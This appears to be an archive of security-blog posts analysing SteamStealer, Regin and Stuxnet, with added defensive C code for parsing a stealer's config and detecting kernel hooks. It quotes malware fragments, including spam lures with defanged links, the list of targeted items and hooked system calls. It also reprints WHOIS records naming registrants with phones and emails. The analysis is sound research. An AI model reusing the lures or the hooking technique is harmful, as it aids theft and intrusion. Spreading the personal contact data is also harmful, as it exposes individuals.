Wednesday, December 31, 2014

SteamStealer - A look into the source code

I've been wanting to take a bit of a look at the recent SteamStealer malware that has been going around throughout November and December. There are a few different types, mainly .src executables that, once executed, connect to a designated domain and drop more stuff. The other, more recent type uses a custom crypter with a library containing a RunPE function to eventually load SteamStealer into the process. In any case, I won't be doing any "on the surface" analysis/removal tips, as it's been nicely done by blogs such as this. I'll instead be taking a look at the source code for a few of these .src files and talking a bit about them as well.

So first off, the big thing regarding a lot of these recent .src files is that they are obfuscated with Confuser, or its successor ConfuserEx. Confuser is a pretty popular free obfuscator, mainly because it isn't completely easy to reverse. It's still reversible, just not as easily as many other free obfuscators out there. You can do it with WinDbg, which is absolutely gruesome and not really recommended for .NET deobfuscation, as anything past methods is difficult and time consuming. Alternatively, you can use the wonderful internet world we have to get any number of tools: method decryptors, delegate killers, dumpers and string decryptors.

Let's first take a look at what the thumbnails for the samples look like:


As we can see, the thumbnails appear as a Steam inventory with various items.

Back to obfuscation, if we try to take one of our .src samples obfuscated with Confuser into IDA, here's what we get:


After deobfuscation however, we can successfully take a somewhat broken look at the source code. Near the top of the code you can generally find the following (and hilarious) format:

 newobj  instance void SteamWorker::.ctor()  
   stloc.0  
   ldloc.0  
   ldstr  "7656119816xxxxxxx" // Steam ID  
   ldstr  "203496355"  
   ldstr  "N71Ll_bP"  

All of the Steam IDs extracted from the various source code samples are 8 or 9 (mostly 9) digit IDs, implying they're new accounts, not old ones by any means. With this said, these accounts were of course created for the sole purpose of spamming trades with this malware, and most likely selling valuable items for real money. I wouldn't be surprised if they were purchased or stolen IDs.

   callvirt instance void SteamWorker::getSessionID()  
   ldloc.0  
   ldstr  "csgolounge"  
   ldstr  "how much is this karambit knife? hxxp://screen4say.com/image.png"  
   callvirt instance void SteamWorker::SpamGroup(string, string)  
   ldloc.0  
   ldstr  "dota2lounge"  
   ldstr  "how much is this unusual courier? hxxp://screen4say.com/image.png"  
   callvirt instance void SteamWorker::AddGroupAndMess(string, string)  
   ldloc.0  
   callvirt instance void SteamWorker::getFriends()  
   ldloc.0  
   ldstr  "He give me this knife hxxp://screen4say.com/image.png ty for you :)"  
   callvirt instance void SteamWorker::sendMessWall(string)  
   ldloc.0  
   callvirt instance void SteamWorker::DeleteAll()  

Above is an example of one of the many domains used by the malware (purged). You can see it would join the Steam group "csgolounge" and then message users "how much is this karambit knife?" with a link to the malware. This is how it mainly propagated: by joining various Steam trade groups and spamming anyone with a public inventory, mainly "csgolounge" and "dota2lounge", as those were the main games the malware targeted.

Domains used from what I've seen are: prntsrc-online, screen4free, hostingscreen, screenshotyou, etc.

If we do a lookup on any one of those:

 Domain name: prntsrc-online.com  
 Domain idn name: prntsrc-online.com  
 Status: clientTransferProhibited  
 Registry Domain ID:  
 Registrar WHOIS Server: whois.reg.ru  
 Registrar URL: https://www.reg.com/  
 Registrar URL: https://www.reg.ru/  
 Registrar URL: https://www.reg.ua/  
 Updated Date: 2014-12-15  
 Creation Date: 2014-12-15T19:18:01Z  
 Registrar Registration Expiration Date: 2015-12-15  
 Registrar: Domain names registrar REG.RU LLC  
 Registrar IANA ID: 1606  
 Registrar Abuse Contact Email: [masked]@reg.ru  
 Registrar Abuse Contact Phone: +7.4955801111  
 Registry Registrant ID:  
 Registrant Name: Ivan Ivanov  
 Registrant Organization: Yandex LTD  
 Registrant Street: ul.Koshkina 15 kv 4  
 Registrant City: Moscow  
 Registrant State/Province: MOSCOW STATE  
 Registrant Postal Code: 132170  
 Registrant Country: RU  
 Registrant Phone: +79871975615  
 Registrant Phone Ext:  
 Registrant Fax:  
 Registrant Fax Ext:  
 Registrant Email: spamspam228@mail.ru
 Registry Admin ID:  
 Admin Name: Ivan Ivanov  
 Admin Organization: Yandex LTD  
 Admin Street: ul.Koshkina 15 kv 4  
 Admin City: Moscow  
 Admin State/Province: MOSCOW STATE  
 Admin Postal Code: 132170  
 Admin Country: RU  
 Admin Phone: +79871975615  
 Admin Phone Ext:  
 Admin Fax:  
 Admin Fax Ext:  
 Admin Email: spamspam228@mail.ru  
 Registry Tech ID:  
 Tech Name: Ivan Ivanov  
 Tech Organization: Yandex LTD  
 Tech Street: ul.Koshkina 15 kv 4  
 Tech City: Moscow  
 Tech State/Province: MOSCOW STATE  
 Tech Postal Code: 132170  
 Tech Country: RU  
 Tech Phone: +79871975615  
 Tech Phone Ext:  
 Tech Fax:  
 Tech Fax Ext:  
 Tech Email: spamspam228@mail.ru  
 Name Server: ns1.hostinger.ru  
 Name Server: ns2.hostinger.ru  
 Name Server: ns3.hostinger.ru  
 Name Server: ns4.hostinger.ru  
 DNSSEC: Unsigned  

Regarding this search, we can see it's a Russian based domain that was created and is administered by spamspam228(at)mail.ru. There's no doubt spamspam228 is a legitimate email, right? My favorite part isn't the email, but that the registrant's name is Ivan Ivanov from the organization Yandex LTD. This is absolutely hilarious considering Yandex is a Russian search engine (and ISP I believe?). I don't think Mr. Ivan Ivanov from Yandex is behind this.

If we now go ahead and look up this email, we can see:

 The email spamspam228@mail.ru is related to these domains :  
 1. printsrceen.com  
 2. prntsrc-online.com  

There's another interesting one:

 Domain Name: PICTURES-SCREEN.NET  
 Registry Domain ID:  
 Registrar WHOIS Server: whois.publicdomainregistry.com  
 Registrar URL: www.publicdomainregistry.com  
 Updated Date: 2014-12-23T16:15:07Z  
 Creation Date: 2014-12-23T16:15:05Z  
 Registrar Registration Expiration Date: 2015-12-23T16:15:05Z  
 Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com  
 Registrar IANA ID: 303  
 Registrar Abuse Contact Email: 
 Registrar Abuse Contact Phone: +1-2013775952  
 Domain Status: clientTransferProhibited  
 Registry Registrant ID:  
 Registrant Name: Xuila Pitrov Vasielvis  
 Registrant Organization: ScreenPictures  
 Registrant Street: Puschcicha,4,15   
 Registrant City: Moscow  
 Registrant State/Province: Moscow  
 Registrant Postal Code: 148821  
 Registrant Country: RU  
 Registrant Phone: +7.9652422078  
 Registrant Phone Ext:  
 Registrant Fax:  
 Registrant Fax Ext:  
 Registrant Email: jesus7298@mail.ru  
 Registry Admin ID:  
 Admin Name: Xuila Pitrov Vasielvis  
 Admin Organization: ScreenPictures  
 Admin Street: Puschcicha,4,15   
 Admin City: Moscow  
 Admin State/Province: Moscow  
 Admin Postal Code: 148821  
 Admin Country: RU  
 Admin Phone: +7.9652422078  
 Admin Phone Ext:  
 Admin Fax:  
 Admin Fax Ext:  
 Admin Email: jesus7298@mail.ru  
 Registry Tech ID:  
 Tech Name: Xuila Pitrov Vasielvis  
 Tech Organization: ScreenPictures  
 Tech Street: Puschcicha,4,15   
 Tech City: Moscow  
 Tech State/Province: Moscow  
 Tech Postal Code: 148821  
 Tech Country: RU  
 Tech Phone: +7.9652422078  
 Tech Phone Ext:  
 Tech Fax:  
 Tech Fax Ext:  
 Tech Email: jesus7298@mail.ru  
 Name Server: ns1.webhost1.ru  
 Name Server: ns2.webhost1.ru  
 DNSSEC:Unsigned  

Administered by a Xuila Pitrov Vasielvis, from Russia once again, from the organization "ScreenPictures". It's the domain name backwards, hilarious. It's registered/administered by/to the email jesus7298(at)mail.ru. Once again, an interesting choice for an email.

If we now go ahead and look up this email, we can see:

 The email jesus7298@mail.ru is related to these domains :  
 1. pictures-screen.net  
 2. picturesscreen.net  
 3. screenshotcapture.net  

See the pattern? Lots of malicious domains hosted and administered by Russians.

So right away after deobfuscation you can find the Steam ID of the account the items are ultimately being sent to for collection, and information regarding the domain housing the malware. Of course after we find a Steam ID, we can look that up and find the profile on Steam Community. I won't be posting the Steam ID's publicly even though these accounts were used for malicious purposes, because I'm just here to analyze and that's it. You can probably dig up the profiles if you care enough to report them.


Right, so we can see that this account is level 1 (new), the only game it has played is Dota 2, and it has joined the Dota 2 group so it can spam the malware. We can see this person was nice enough to leave their Skype, name (possibly fake in some cases), etc. I have blanked it out, as I said I would. Let's take a look at another account:


This account is a bit more active, with 5.9 hours of Dota 2 played in the last two weeks. It's also level 2, as opposed to the previous account, which was only level 1. This account is also in two of the usual spam groups rather than one. With all of the above said, this account was likely spamming more successfully than the first. Either that, or it was actually used for spamming the malware, rather than merely prepared for it.

You can see the "view more info" button, behind which the user hilariously left most if not all of their online credentials and places to find them. One of the links was to a Russian hack forum on which they hosted a thread offering various "services".

We can see some of the items the malware looked to steal:

   ldstr  "440,570,730,753"  
   ldstr  "753:gift;570:rare,legendary,Dc,mythical,arcana,normal,unusual,ancient,tool,key;440:unusual,hat,tool,key;730:tool,knife,pistol,smg,shotgun,rifle,sniper rifle,machinegun,sticker,key"  
   callvirt instance void SteamWorker::addItemsToSteal(string, [opt] string)  

The first few are the Dota 2 rarity tiers for an item, and then we branch off to keys, unusual hats, hats in general, etc., eventually ending up with Counter-Strike items. Considering, for example, that unusual hats can go upwards of several hundred dollars depending on the type, effect, etc., this is a pretty annoying piece of malware for people who aren't aware of it.
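As an added example (not part of the original post, and not the malware's own code), here is a small C parser for that addItemsToSteal configuration format, the kind of thing you would write to pull the targeted AppIDs and item categories out of a batch of deobfuscated samples. The config string below is a constructed copy of the one quoted above; the function and type names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed copy of the addItemsToSteal argument quoted above. */
static const char *SAMPLE_CONFIG =
    "753:gift;"
    "570:rare,legendary,Dc,mythical,arcana,normal,unusual,ancient,tool,key;"
    "440:unusual,hat,tool,key;"
    "730:tool,knife,pistol,smg,shotgun,rifle,sniper rifle,machinegun,sticker,key";

#define MAX_RULES 16
#define MAX_CATS  32
#define CAT_LEN   32

/* One "<appid>:<cat>,<cat>,..." rule; app_id is the Steam AppID the categories apply to. */
typedef struct {
    unsigned app_id;
    int ncats;
    char cats[MAX_CATS][CAT_LEN];
} app_rule;

/* Parse the ';'-separated rule list. Returns the number of rules, or -1 if the
 * string is malformed (missing "<appid>:", empty category, too many/too long). */
int parse_item_rules(const char *config, app_rule *out, int max_out)
{
    int n = 0;
    const char *p = config;
    while (*p != '\0') {
        char *end;
        unsigned long id;
        if (n >= max_out) return -1;
        id = strtoul(p, &end, 10);
        if (end == p || *end != ':') return -1;      /* every rule starts with "<appid>:" */
        out[n].app_id = (unsigned)id;
        out[n].ncats = 0;
        p = end + 1;
        while (*p != '\0' && *p != ';') {           /* categories run until ';' or end */
            const char *q = p;
            size_t len;
            while (*q != '\0' && *q != ',' && *q != ';') q++;
            len = (size_t)(q - p);
            if (len == 0 || len >= CAT_LEN || out[n].ncats >= MAX_CATS) return -1;
            memcpy(out[n].cats[out[n].ncats], p, len);
            out[n].cats[out[n].ncats][len] = '\0';
            out[n].ncats++;
            p = (*q == ',') ? q + 1 : q;
        }
        if (*p == ';') p++;
        n++;
    }
    return n;
}

/* 1 if an item of `category` in `app_id` would be selected by the parsed rules, else 0. */
int rules_target(const app_rule *rules, int n, unsigned app_id, const char *category)
{
    for (int i = 0; i < n; i++) {
        if (rules[i].app_id != app_id) continue;
        for (int j = 0; j < rules[i].ncats; j++)
            if (strcmp(rules[i].cats[j], category) == 0) return 1;
    }
    return 0;
}

/* Convenience wrappers so a result can be checked without setting up buffers. */
int count_rules(const char *config)
{
    app_rule rules[MAX_RULES];
    return parse_item_rules(config, rules, MAX_RULES);
}

int sample_targets(unsigned app_id, const char *category)
{
    app_rule rules[MAX_RULES];
    int n = parse_item_rules(SAMPLE_CONFIG, rules, MAX_RULES);
    return n < 0 ? 0 : rules_target(rules, n, app_id, category);
}

int main(void)
{
    app_rule rules[MAX_RULES];
    int n = parse_item_rules(SAMPLE_CONFIG, rules, MAX_RULES);
    for (int i = 0; i < n; i++) {
        printf("AppID %u: %d categories:", rules[i].app_id, rules[i].ncats);
        for (int j = 0; j < rules[i].ncats; j++) printf(" [%s]", rules[i].cats[j]);
        printf("\n");
    }
    return n < 0;
}
```

Running it lists four AppIDs (753, 570, 440, 730) with their category lists; a malformed string such as one without the "appid:" prefix makes the parser return -1 rather than silently producing partial rules.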

Overall, however, it's not a very impressive piece of malware by any means; it just looks like script stuff. I don't think it was meant to be, though. It has obviously satisfied its original and intended goal, which was to steal items. A lot of people have had their items stolen simply because, as I noted above, a lot of people aren't aware of it. Although I said I wouldn't go into removal, the way to avoid this malware, other than just understanding how it works, is to make your trades private.

Friday, December 19, 2014

Regin, the top-tier PASSIVE_LEVEL malware!

Over the past few weeks it seems left and right there's Regin this, Regin that. I am not going to do a detailed analysis and discuss its stages and what have you, as there are various informative in-depth whitepapers, etc.

To name a few:

Symantec, Symantec.
Kaspersky, Kaspersky.
F-Secure.

In my opinion, Regin is your typical malware that expands outside of the reverse engineer/security community due to its original goal. Journalists or researchers with little kernel-level knowledge/background get a hold of it and before you know it, it's the next biggest sophisticated piece of malware and all that matters is PR. At this point, writing accurate and detailed articles doesn't matter anymore. What am I referring to, and what will I instead talk about with Regin?

Secret Malware in European Union Attack Linked to U.S. and British Intelligence.

Let's quickly talk about a short few things the whitepapers haven't mentioned (as far as I am aware), and the above article. Respectfully, I have absolutely no idea who reviewed the above article before it was pushed. You have to wonder if The Intercept rushed like hell to publish this article because Symantec released their whitepaper and didn't care about what half of it even said. Note the dates:



There's a lot of strange and irrelevant information in that article you can pick at, but the absolute best is:
This Regin driver recurrently checks that the current IRQL (Interrupt Request Level) is set to PASSIVE_LEVEL using the KeGetCurrentIrql() function in many parts of the code, probably in order to operate as silently as possible and to prevent possible IRQL confusion. This technique is another example of the level of precaution the developers took while designing this malware framework.
Since its publication date this has yet to be changed, so I guess they don't care about its inaccuracies after all. Anyway, if it's not a surprise, calling KeGetCurrentIrql over and over again throughout the code is just the PAGED_CODE macro. It has absolutely nothing to do with stealth, and PASSIVE_LEVEL doesn't automatically imply obfuscation or stealth. For example, here's an excerpt from db405ad775ac887a337b02ea8b07fddc (kernel driver - stage 1).

 call  KeGetCurrentIrql  
 test  al, al  
 jnz   short loc_FDEFAA3D  
 push  dword ptr [esi] ; Handle  
 call  ZwClose  
 test  eax, eax  
 jnz   short loc_FDEFAA3D  
 push  18h  
 push  ebx  
 push  esi  
 call  sub_FDEFA2EC  
 add   esp, 0Ch  
 mov   bl, 1  


Again taking a look at db405ad775ac887a337b02ea8b07fddc, there's another interesting tidbit throughout the code:

 push  43726150h 
 push  20h  
 push  edi  
 call  ds:ExAllocatePoolWithTag  

The above is the kernel-mode driver's pool tag, the number of bytes to allocate for the memory request, the pool type, and finally the call to ExAllocatePoolWithTag that allocates the pool memory. Okay, so what's the big deal? If we convert the pool tag operand to characters, we get the following result:

 push  'CraP'  
 push  20h  
 push  edi  
 call  ds:ExAllocatePoolWithTag  

The pool tag is CraP : ) This is probably how many of us feel about this malware being so hyped by the media. There are of course others throughout the code, for example:

 push  'CraP'  
 push  eax  
 push  1  
 call  ds:ExAllocatePoolWithTag  
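An added example, not code from the post: a few C helpers for working with pool tags as they appear in a disassembly. They convert between the multi-character constant IDA prints and the value as it sits in memory (the byte-reversed form that poolmon and WinDbg's !pool display), and scan a constructed byte encoding of the two call sites above for push imm32 immediates that look like tags. The function names and the sample bytes are my own assumptions; the call's indirect address is zeroed because the listing doesn't give it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Build the tag value as IDA shows it: a multi-character constant with the
 * first character in the most significant byte, so "CraP" -> 0x43726150. */
uint32_t tag_from_constant(const char s[4])
{
    return ((uint32_t)(uint8_t)s[0] << 24) | ((uint32_t)(uint8_t)s[1] << 16) |
           ((uint32_t)(uint8_t)s[2] << 8)  |  (uint32_t)(uint8_t)s[3];
}

/* Byte-swap: the same tag as it sits in little-endian memory and as poolmon
 * or WinDbg's !pool print it. 'CraP' is stored and displayed as "ParC". */
uint32_t tag_in_memory_order(uint32_t tag)
{
    return (tag >> 24) | ((tag >> 8) & 0x0000ff00u) |
           ((tag << 8) & 0x00ff0000u) | (tag << 24);
}

/* Render a tag value as 4 characters (most significant byte first) for printing. */
void tag_to_text(uint32_t tag, char out[5])
{
    out[0] = (char)(tag >> 24); out[1] = (char)(tag >> 16);
    out[2] = (char)(tag >> 8);  out[3] = (char)tag; out[4] = '\0';
}

/* Heuristic: all four bytes printable ASCII (0x20..0x7e), as real pool tags are. */
int looks_like_tag(uint32_t tag)
{
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(tag >> (8 * i));
        if (b < 0x20 || b > 0x7e) return 0;
    }
    return 1;
}

/* Scan raw 32-bit x86 code for `push imm32` (opcode 0x68) whose immediate looks
 * like a tag. This is a byte scan, not a disassembler, so a 0x68 that falls inside
 * another instruction can yield a false positive; treat the output as candidates
 * to confirm in IDA. Returns the number found, storing up to `max` of them. */
int find_tag_candidates(const uint8_t *code, size_t len, uint32_t *tags, int max)
{
    int n = 0;
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] != 0x68) continue;
        uint32_t imm = (uint32_t)code[i + 1] | ((uint32_t)code[i + 2] << 8) |
                       ((uint32_t)code[i + 3] << 16) | ((uint32_t)code[i + 4] << 24);
        if (looks_like_tag(imm) && n < max) tags[n++] = imm;
    }
    return n;
}

/* Constructed encoding of the two call sites quoted above (the call's indirect
 * address is zeroed since the listing does not give it):
 *   push 43726150h / push 20h / push edi / call ds:ExAllocatePoolWithTag
 *   push 43726150h / push eax / push 1   / call ds:ExAllocatePoolWithTag   */
static const uint8_t SAMPLE_CODE[] = {
    0x68, 0x50, 0x61, 0x72, 0x43,  0x6A, 0x20,  0x57,        0xFF, 0x15, 0, 0, 0, 0,
    0x68, 0x50, 0x61, 0x72, 0x43,  0x50,        0x6A, 0x01,  0xFF, 0x15, 0, 0, 0, 0,
};

/* Number of tag candidates in the constructed sample, for checking. */
int sample_candidate_count(void)
{
    uint32_t tags[8];
    return find_tag_candidates(SAMPLE_CODE, sizeof SAMPLE_CODE, tags, 8);
}

int main(void)
{
    uint32_t tags[8];
    int n = find_tag_candidates(SAMPLE_CODE, sizeof SAMPLE_CODE, tags, 8);
    for (int i = 0; i < n; i++) {
        char ida[5], mem[5];
        tag_to_text(tags[i], ida);
        tag_to_text(tag_in_memory_order(tags[i]), mem);
        printf("0x%08x  IDA: '%s'  poolmon/!pool: %s\n", tags[i], ida, mem);
    }
    return 0;
}
```

The practical point is the byte order: a tag that reads 'CraP' in IDA's operand shows up as "ParC" in poolmon or a !pool dump, so if you are hunting a driver's allocations on a live system, search for the reversed form.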

Overall, I guess the moral is to take time to get as much accurate information as you can for your articles. I cannot speak for anyone but myself, but as someone with a love for reverse engineering, malware, and debugging, I appreciate in-depth whitepapers and articles that provide thorough analysis. If all you're worried about is competition for views and hyping malware, chances are you're not going to appeal to the people who really care about the written content.

PS: Thanks to KernelMode as always for the hilarious discussion.

Sunday, November 16, 2014

Stuxnet - User/Kernel-Mode analysis

Today I'll be taking a look at Stuxnet, and at a kernel level mostly (as usual) more than its impact on user-mode. I'll still however be going over a few user-mode things as it ties in with our kernel level discussion. I also won't go in-depth regarding all of the ways Stuxnet uses its four-slot toolbelt of zero-day flaws, and a lot of other Stuxnet's methods of attack (network, etc). ESET, Symantec, and others have done a fantastic job in that regard.

What is Stuxnet?

First of all, it's important (and a bit hilarious) to know the story behind Stuxnet. If you're researching Stuxnet for the first time, it's really easy to get confused. There's finger pointing, claims, supposed "confirmed sources", etc, left and right. I'll briefly go over it. For example:

Confirmed: US and Israel created Stuxnet, lost control of it.

The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet.
Obama Order Sped Up Wave of Cyberattacks Against Iran.

Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet.
US unleashed Stuxnet cyber war on Iran to appease Israel – report.

The US and Israel made the Stuxnet virus as a new kind of weapon targeted against Iran, a media investigation revealed. The operation reportedly started in the Bush era, but was intensified by Obama administration.
Snowden confirms NSA created Stuxnet with Israeli aid.

“The NSA and Israel wrote Stuxnet together,” Snowden told Applebaum in the interview that was carried out in May.
The big TLDR is here - Operation Olympic Games.

My initial reaction was "What the hell am I reading?", and it still sort of is. It goes on and on. All in all, after reading the above, you're likely inclined to believe that the US (and maybe even Israel) were behind Stuxnet. Whether or not this is true is a story for another day, although it's easier to lean towards 'yes' than it is to 'no'. The reason for this is due to the fact that Stuxnet as I discussed above used four zero-day flaws within Windows. It's a pretty big deal when malware exploits one zero-day flaw within the OS, but four is extremely high.

It's also pretty laughable to think that Stuxnet was created by amateurs, whether people with no involvement in any organization dealing with cyber warfare or amateurs in general. A lot of amateurs make malware for a lot of reasons, but causing nuclear centrifuges to commit suicide is pretty advanced. Aside from the many reasons to believe the answer is yes, some may lean towards no, largely because most cannot imagine the US and Israel working closely together to create something like Stuxnet.

I digress, and in any case, I'm not here to discuss politics or debate the true creator(s), so let's just get to the part where we talk about what Stuxnet was primarily created for. Stuxnet is a worm that was developed primarily to target industrial PLCs, which led to the nuclear centrifuges ultimately destroying themselves. The malware obviously couldn't be outright sent to the nuclear facilities themselves, so this is where its USB attack vector comes into play. This is better known as a supply chain attack:

So the creators of Stuxnet, they were thinking that these companies would do some communications with power plant workers; maybe exchange with USB devices. That’s probably how Stuxnet infected the system.

In the end, Stuxnet ended up destroying nearly one-fifth of Iran's centrifuges. In November 2010, it was reported that uranium enrichment within the Natanz nuclear facility had halted several times due to severe technical issues.

User-Mode

Stuxnet has two ways of injecting itself into the address space of a process and then executing exported functions. Stuxnet's user-mode modules are implemented as DLLs, and the first method is done by injecting itself into a preexisting process.

Preexisting Process Inject

1. Allocates a memory buffer in the calling process for the modules to be loaded.

2. Patches ntdll and hooks the following APIs:

  • ZwQueryAttributesFile.
  • ZwQuerySection.
Here's what a clean (unpatched) ntdll MZ header looks like:


We can see some of these hooks in action:

 ServiceDescriptor n°0  
 ---------------------  
   ServiceTable       : nt!KiServiceTable (804e26a8)  
   ParamTableBase      : nt!KiArgumentTable (80510088)  
   NumberOfServices     : 0000011c  
   Index Args Check System call  
   ----- ---- ----- -----------  
   0019  0001 HOOK-> f8c5761c ##### Original -> nt!NtClose (805678dd)  
   0029  0007 HOOK-> f8c575d6 ##### Original -> nt!NtCreateKey (8057065d)  
   0032  0007 HOOK-> f8c57626 ##### Original -> nt!NtCreateSection (805652b3)  
   0035  0008 HOOK-> f8c575cc ##### Original -> nt!NtCreateThread (8058e63f)  
   003F  0001 HOOK-> f8c575db ##### Original -> nt!NtDeleteKey (805952be)  
   0041  0002 HOOK-> f8c575e5 ##### Original -> nt!NtDeleteValueKey (80592d50)  
   0044  0007 HOOK-> f8c57617 ##### Original -> nt!NtDuplicateObject (805715e0)  
   0062  0002 HOOK-> f8c575ea ##### Original -> nt!NtLoadKey (805aed5d)  
   007A  0004 HOOK-> f8c575b8 ##### Original -> nt!NtOpenProcess (805717c7)  
   0080  0004 HOOK-> f8c575bd ##### Original -> nt!NtOpenThread (8058a1bd)  
   00B1  0006 HOOK-> f8c5763f ##### Original -> nt!NtQueryValueKey (8056a1f1)  
   00C1  0003 HOOK-> f8c575f4 ##### Original -> nt!NtReplaceKey (8064f0fa)  
   00C8  0003 HOOK-> f8c57630 ##### Original -> nt!NtRequestWaitReplyPort (80576ce6)  
   00CC  0003 HOOK-> f8c575ef ##### Original -> nt!NtRestoreKey (8064ec91)  
   00D5  0002 HOOK-> f8c5762b ##### Original -> nt!NtSetContextThread (8062dcdf)  
   00ED  0003 HOOK-> f8c57635 ##### Original -> nt!NtSetSecurityObject (8059b19b)  
   00F7  0006 HOOK-> f8c575e0 ##### Original -> nt!NtSetValueKey (80572889)  
   00FF  0006 HOOK-> f8c5763a ##### Original -> nt!NtSystemDebugControl (80649ce3)  
   0101  0002 HOOK-> f8c575c7 ##### Original -> nt!NtTerminateProcess (805822e0)  


If we for example go ahead and disassemble our hooked nt!NtClose function, we see the following:

 lkd> u 0xFFFFFFFFF8C5761C L1  
 f8c5761c e92d8b23fe   jmp   f6e9014e  
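As an added example rather than anything from the post or the dump above, here is the check an analyst would script over such a service table, written in C: flag any entry whose handler lies outside the ntoskrnl image, then follow the rel32 jmp at the hooked address to see where the detour lands. The table rows are taken from the dump above plus one constructed clean row; the image base/end values and the function names are assumptions, since the page doesn't give the kernel's load range.

```c
#include <stdint.h>
#include <stdio.h>

/* One row of a dumped service table: syscall index, current handler address, name. */
typedef struct {
    uint16_t    index;
    uint32_t    handler;
    const char *name;
} ssdt_entry;

/* Constructed sample: three rows taken from the dump above (the HOOK-> address is
 * what the table currently holds) plus one clean row whose address is made up. */
static const ssdt_entry SAMPLE_TABLE[] = {
    { 0x0000, 0x805b1f30u, "NtAcceptConnectPort (constructed, clean)" },
    { 0x0019, 0xf8c5761cu, "NtClose"         },
    { 0x0029, 0xf8c575d6u, "NtCreateKey"     },
    { 0x0032, 0xf8c57626u, "NtCreateSection" },
};
#define SAMPLE_ROWS (sizeof SAMPLE_TABLE / sizeof SAMPLE_TABLE[0])

/* Assumed ntoskrnl image range for the 32-bit box in the dump; on a live
 * system take these from `lm m nt` rather than hard-coding them. */
#define NT_IMAGE_BASE 0x804d7000u
#define NT_IMAGE_END  0x806e0000u

/* A service table entry is suspicious if it points outside the kernel image.
 * Returns the number of such entries and records up to `max` table positions. */
int find_hooked_entries(const ssdt_entry *table, size_t rows,
                        uint32_t base, uint32_t end, size_t *hooked, size_t max)
{
    int n = 0;
    for (size_t i = 0; i < rows; i++) {
        if (table[i].handler >= base && table[i].handler < end) continue;
        if ((size_t)n < max) hooked[n] = i;
        n++;
    }
    return n;
}

/* Follow a 5-byte `jmp rel32` (E9 xx xx xx xx) at insn_addr, like the one at the
 * hooked NtClose above, to its destination. Returns 0 if it is not such a jmp. */
uint32_t resolve_jmp_rel32(uint32_t insn_addr, const uint8_t bytes[5])
{
    if (bytes[0] != 0xE9) return 0;
    uint32_t rel = (uint32_t)bytes[1] | ((uint32_t)bytes[2] << 8) |
                   ((uint32_t)bytes[3] << 16) | ((uint32_t)bytes[4] << 24);
    return insn_addr + 5 + rel;          /* wraps mod 2^32, as the CPU does */
}

/* Bytes from the `u f8c5761c L1` output above: e9 2d 8b 23 fe. */
static const uint8_t NTCLOSE_HOOK_BYTES[5] = { 0xE9, 0x2D, 0x8B, 0x23, 0xFE };
/* Constructed non-jmp bytes (a nop sled) for the negative case. */
static const uint8_t NOP_BYTES[5] = { 0x90, 0x90, 0x90, 0x90, 0x90 };

int sample_hooked_count(void)
{
    size_t idx[8];
    return find_hooked_entries(SAMPLE_TABLE, SAMPLE_ROWS, NT_IMAGE_BASE, NT_IMAGE_END, idx, 8);
}

int main(void)
{
    size_t idx[8];
    int n = find_hooked_entries(SAMPLE_TABLE, SAMPLE_ROWS, NT_IMAGE_BASE, NT_IMAGE_END, idx, 8);
    for (int i = 0; i < n && i < 8; i++)
        printf("index %04X %-18s -> %08x lies outside nt\n",
               SAMPLE_TABLE[idx[i]].index, SAMPLE_TABLE[idx[i]].name, SAMPLE_TABLE[idx[i]].handler);
    printf("hooked NtClose jumps to %08x\n", resolve_jmp_rel32(0xf8c5761cu, NTCLOSE_HOOK_BYTES));
    return 0;
}
```

The range check is the same test the SSDT hook scanners use: a legitimate service table entry always resolves into nt itself, so anything at an 0xf8xxxxxx driver address is worth a look. Following the jmp reproduces the debugger's f6e9014e destination.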

We have a hook on nt!NtClose and a jump. Classic rootkit behavior. Let's go further and dump the IAT by loading notepad.exe into OllyDbg and viewing executable modules:

 Address  Section  Type  ( Name                  Comment  
 0100102C  .text   Import ( GDI32.AbortDoc  
 0100131C  .text   Import   msvcrt._acmdln  
 0100132C  .text   Import   msvcrt._adjust_fdiv  
 01001300  .text   Import ( msvcrt._cexit  
 01001204  .text   Import ( USER32.CharLowerW  
 01001244  .text   Import ( USER32.CharNextW  
 010011C0  .text   Import ( USER32.CharUpperW  
 01001248  .text   Import ( USER32.CheckMenuItem  
 01001230  .text   Import ( USER32.ChildWindowFromPoint  
 010012D0  .text   Import ( comdlg32.ChooseFontW  
 0100124C  .text   Import ( USER32.CloseClipboard  
 010010F8  .text   Import ( KERNEL32.CloseHandle  
 010012B8  .text   Import   WINSPOOL.ClosePrinter  
 010012E0  .text   Import ( comdlg32.CommDlgExtendedError  
 010010EC  .text   Import ( KERNEL32.CompareStringW  
 0100133C  .text   Import ( msvcrt._controlfp  
 01001040  .text   Import ( GDI32.CreateDCW  
 01001214  .text   Import ( USER32.CreateDialogParamW  
 010010B4  .text   Import ( KERNEL32.CreateFileMappingW  
 01001104  .text   Import ( KERNEL32.CreateFileW  
 01001064  .text   Import ( GDI32.CreateFontIndirectW  
 01001020  .text   Import ( COMCTL32.CreateStatusWindowW  
 010011E0  .text   Import ( USER32.CreateWindowExW  
 010012F4  .text   Import ( msvcrt._c_exit  
 010011A4  .text   Import ( USER32.DefWindowProcW  
 01001034  .text   Import ( GDI32.DeleteDC  
 01001158  .text   Import ( KERNEL32.DeleteFileW  
 01001068  .text   Import ( GDI32.DeleteObject  
 010011A8  .text   Import ( USER32.DestroyWindow  
 01001198  .text   Import ( USER32.DialogBoxParamW  
 01001294  .text   Import ( USER32.DispatchMessageW  
 0100117C  .text   Import ( SHELL32.DragAcceptFiles  
 01001174  .text   Import ( SHELL32.DragFinish  
 01001178  .text   Import ( SHELL32.DragQueryFileW  
 01001210  .text   Import ( USER32.DrawTextExW  
 0100125C  .text   Import ( USER32.EnableMenuItem  
 0100120C  .text   Import ( USER32.EnableWindow  
 01001288  .text   Import ( USER32.EndDialog  
 01001030  .text   Import ( GDI32.EndDoc  
 01001028  .text   Import ( GDI32.EndPage  
 01001054  .text   Import ( GDI32.EnumFontsW  
 01001308  .text   Import ( msvcrt._except_handler3  
 010012F0  .text   Import ( msvcrt._exit  
 01001318  .text   Import ( msvcrt.exit  
 0100111C  .text   Import ( KERNEL32.FindClose  
 01001120  .text   Import ( KERNEL32.FindFirstFileW  
